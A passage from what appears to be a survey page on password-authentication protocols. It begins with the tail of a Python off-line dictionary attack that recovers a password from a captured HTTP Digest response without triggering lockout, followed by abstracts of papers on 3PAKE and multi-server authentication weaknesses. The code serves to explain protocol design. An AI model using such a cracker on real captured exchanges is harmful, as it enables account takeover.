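    """Off-line dictionary attack: recompute the response per candidate and
    compare with the captured one. Nothing is sent to the server, so rate
    limiting and account lockout never trigger."""
    fields = {k: v for k, v in captured.items() if k != "response"}
    for candidate in wordlist:
        if digest_response(password=candidate, **fields) == captured["response"]:
            return candidate
    return None


if __name__ == "__main__":
    print("RFC 2617 vector ok:", RFC2617_VECTOR == "6629fae49393a05397450978507c4ef1")
    print("recovered password:", offline_guess(CAPTURED, WORDLIST))
```

The attack needs only one captured exchange and scales with the attacker's hashing speed, which is why the schemes surveyed on this page move to two-factor designs (smart card plus password) or to key exchange in which the password-dependent value is never exposed to an off-line check.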

Journal ArticleDOI
TL;DR: The results show that the probability of eavesdropping attacks varies significantly depending on the wireless environment (such as the shadow fading effect, node density, and antenna types), which lays the foundation for preventing eavesdropping attacks in more effective and more economical ways.

Journal ArticleDOI
TL;DR: This paper applies the pi calculus-based formal verification tool ProVerif to show that the improved chaotic maps-based 3PAKE protocol achieves authentication and security and shows that the protocol is more efficient than Farash and Attari’s protocol in terms of computation and communication costs.
Abstract: Three-party password-authenticated key exchange (3PAKE) protocol allows two users to establish a secure session key over an insecure communication channel with the help of a trusted server. Recently, Farash and Attari proposed a chaotic maps-based 3PAKE protocol without using the server's public key, smart card or symmetric cryptosystems and claimed its security by providing a well-organized security proof. Unfortunately, in this paper, we demonstrate that their protocol cannot resist impersonation attack and off-line password guessing attack. To overcome their security weaknesses, we propose an improved chaotic maps-based 3PAKE protocol with the same advantages. Further, we apply the pi calculus-based formal verification tool ProVerif to show that our 3PAKE protocol achieves authentication and security, and show that our protocol is more efficient than Farash and Attari's protocol in terms of computation and communication costs.

Journal ArticleDOI
TL;DR: An improved version of dynamic ID based authentication protocol is proposed, which covers all the identified weaknesses of Li et al.'s protocol and is more secure and efficient for practical multi-server environments.
Abstract: Due to the rapid growth of computer networks and service-providing servers, many network environments have adopted a multi-server architecture and various multi-server authentication protocols have been proposed. In such an environment, a user can obtain different network services from multiple network servers without repeating registration at each server. Recently, Li et al. proposed a secure dynamic ID based authentication protocol for multi-server architecture using smart cards. They claimed that their protocol preserves mutual authentication and is protected against several attacks. However, in this paper, we find that Li et al.'s protocol cannot provide protection against leak-of-verifier attack, impersonation attack, session key disclosure attack and many logged-in users' attack. To remedy these security flaws, we propose an improved version of the dynamic ID based authentication protocol, which covers all the identified weaknesses of Li et al.'s protocol and is more secure and efficient for practical multi-server environments.